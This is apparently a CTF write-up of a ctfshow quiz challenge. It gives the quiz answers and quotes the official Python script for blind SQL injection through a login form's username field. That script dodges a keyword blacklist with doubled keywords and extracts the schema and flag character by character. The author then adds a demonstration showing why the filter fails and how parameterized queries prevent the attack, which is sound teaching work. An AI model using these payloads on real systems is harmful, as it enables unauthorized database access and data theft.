ctfshow - CTF Knowledge Quiz
A SQL injection challenge!
The injection point is the username field of the login form!
Quiz answers: it turns out the flag is not handed out just for answering the questions correctly!
1. CTF (Capture The Flag) originated from which of the following events? A
A. DEFCON CTF
B. CJB CTF
C. XCTF
D. S3C CTF
2. Which of the following is not a CTF competition format? D
A. Jeopardy (problem-solving)
B. Attack-defense
C. Mixed
D. Penetration
3. Which of the following protocols is mainly used for encryption? C
A. HTTP
B. FTP
C. SSL
D. TELNET
4. Deliberately creating or spreading computer viruses or other destructive programs that interfere with the normal operation of computer systems, with serious consequences, is punishable by what? B
A. Detention of up to one month
B. Fixed-term imprisonment of up to five years or criminal detention
C. A warning and a fine
D. The death penalty
5. The subnet mask of the IP address block 222.21.123.189/13 can be written in which of the following forms? C
A. 255.255.255.0
B. 255.224.0.0
C. 255.248.0.0
D. 255.240.0.0
6. What is the name of the function that outputs information about the PHP configuration?
phpinfo
7. As of May 31, 2021, what is the number of the most recent RFC document?
9038
8. What does the 'S' in RSA stand for?
Shamir
9. (True/False) ROP is a register.
False
10. ORW stands for 'Over-Range-Write'.
False
Below is the official writeup. I have not been able to reproduce it yet; I will try again when I get the chance. For now the goal is to understand the payload. The official writeup says that if you write the rules, sqlmap can be used, so there is still more to learn!
Filter statement:
```php
$username = preg_replace('/union|select|flag|in|or|on|where|and|-|=|
|like/i', "", $_POST['username']);
```
Payload:
```python
'''
-*- coding: utf-8 -*-
@File: exp.py
@Author: gyy
@Time: Mar 13, 2021
'''
import requests
import time

url = "http://127.0.0.1:51415/"

# Register a dummy account so that a login with studentid "1" can succeed.
requests.post(url=url+"/register.php",
              data={
                  "username": "1",
                  "studentid": "1",
                  "submit": "提交"
              })


def req(payload):
    # Clear the current session, then log in with the payload as the username.
    requests.get(url=url+"/logout.php")
    # Use /**/ (an inline SQL comment) in place of spaces as the separator.
    payload = payload.replace(" ", "/**/")
    print(payload)
    data = {
        "username": payload,
        "studentid": "1",
        "submit": "提交"
    }
    res = requests.post(url=url+"/login.php", data=data)
    # The login page prints "错误" (error) when the injected condition is false.
    if "错误" in res.text:
        return -1
    else:
        return 1


def binary_search(payload, url):  # binary search over the ASCII value of one character
    # payload = payload.replace("=",">=")
    high = 128
    low = 1
    while True:
        time.sleep(0.05)
        if (high - low) < 4:
            # Narrow window: test the remaining candidates one by one.
            for mid in range(low, high + 1):
                time.sleep(0.05)
                if req(payload % mid) == -1:
                    return mid
            return -1
        mid = (high + low) // 2
        pd = payload % mid
        if req(pd) == 1:
            low = mid + 1
        else:
            high = mid


def version():
    resultstr = ""
    for i in range(1, 100):
        # Keywords are written doubled so the single-pass filter rebuilds them.
        payload = "1'anandd if(ascii(substr(versioonn(),{},1))>%d,1,0)lilikeke 1#".format(i)
        # 1'and/**/if(ascii(substr(version(),1,1))>64,1,1)like/**/1#
        j = binary_search(payload, url)
        if j > 10:
            resultstr = resultstr + chr(j)
            print(resultstr)
        else:
            break
    resultstr = "version==========>"+resultstr
    print(resultstr)


def database():
    resultstr = ""
    for i in range(1, 100):
        payload = "1'anandd if(ascii(substr((selselectect group_coonncat(schema_name) from iinnfoorrmatioonn_schema.schemata),{},1))>%d,1,0)lilikeke 1#".format(i)
        j = binary_search(payload, url)
        if j > 10:
            resultstr = resultstr + chr(j)
            print(resultstr)
        else:
            break
    resultstr = "databases==========>"+resultstr
    print(resultstr)


def table():
    resultstr = ""
    for i in range(1, 10000):
        payload = "1'anandd if(ascii(substr((selselectect group_coonncat(table_name) from iinnfoorrmatioonn_schema.tables whwhereere(table_schema)lilikeke('scoorre')),{},1))>%d,1,0)lilikeke 1#".format(i)
        j = binary_search(payload, url)
        if j > 10:
            resultstr = resultstr + chr(j)
            print(resultstr)
        else:
            break
    resultstr = "tables==========>"+resultstr
    print(resultstr)


def columns():
    resultstr = ""
    for i in range(1, 10000):
        payload = "1'anandd if(ascii(substr((selselectect(group_coonncat(column_name))from(iinnfoorrmatioonn_schema.columns)whwhereere(table_name)lilikeke('ctf')),{},1))>%d,1,0)lilikeke 1#".format(i)
        j = binary_search(payload, url)
        if j > 10:
            resultstr = resultstr + chr(j)
            print(resultstr)
        else:
            break
    resultstr = "columns==========>"+resultstr
    print(resultstr)


def data():
    resultstr = ""
    for i in range(1, 10000):
        payload = "1'anandd if(ascii(substr((selselectect(group_coonncat(value))from(ctf)),{},1))>%d,1,0)lilikeke 1#".format(i)
        j = binary_search(payload, url)
        if j > 10:
            resultstr = resultstr + chr(j)
            print(resultstr)
        else:
            break
    resultstr = "data==========>"+resultstr
    print(resultstr)


if __name__ == "__main__":
    version()
    database()
    table()
    columns()
    data()
```
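To see why the filter above is defeated by the doubled keywords in the official script (and why a blacklist is the wrong fix), here is an added example of mine, not code from the challenge or the official writeup. It re-expresses the PHP preg_replace blacklist as a Python regex (reading the line break inside the original pattern as a newline alternative, which is my assumption), shows that one left-to-right pass turns "selselectect" back into "select" while mangling an ordinary username, and contrasts it with a parameterized lookup against a constructed in-memory SQLite table, where the same input is bound as data and has no syntactic effect.

```python
import re
import sqlite3

# The challenge's single-pass blacklist, re-expressed in Python (the "\n" alternative is
# my reading of the line break inside the original PHP pattern; assumption).
BLACKLIST = re.compile(r"union|select|flag|in|or|on|where|and|-|=|\n|like", re.IGNORECASE)


def strip_once(s: str) -> str:
    """Single left-to-right pass, exactly like preg_replace: each match is removed once
    and the characters left behind are never re-examined, so "selselectect" -> "select"."""
    return BLACKLIST.sub("", s)


def strip_until_stable(s: str) -> str:
    """Repeat the removal until the string stops changing. This closes the doubling
    trick but is still a blacklist: it keeps damaging legitimate input."""
    while True:
        t = BLACKLIST.sub("", s)
        if t == s:
            return t
        s = t


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the challenge's login backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, studentid TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("1", "1"))
    return conn


def login(conn: sqlite3.Connection, username: str, studentid: str) -> bool:
    """Parameterized lookup: username is sent as a bound value, never spliced into SQL,
    so quotes, keywords and comment markers inside it are just characters to compare."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND studentid = ?",
        (username, studentid),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    doubled = "1'anandd if(ascii(substr(versioonn(),1,1))>64,1,0)lilikeke 1#"
    print(strip_once(doubled))        # one pass rebuilds every stripped keyword
    print(strip_once("Gordon"))       # a harmless username is damaged by the same filter
    print(strip_until_stable(doubled))  # stable stripping also destroys most of the input
    conn = make_db()
    print(login(conn, "1", "1"))                   # True: the registered user
    print(login(conn, strip_once(doubled), "1"))   # False: the payload is just a string
```

The takeaway is the one the writeup's payloads rely on: preg_replace removes each match once and moves on, so any keyword can be reassembled from two halves around a stripped copy. Parameterized queries make the question moot, because the username never reaches the SQL parser as code.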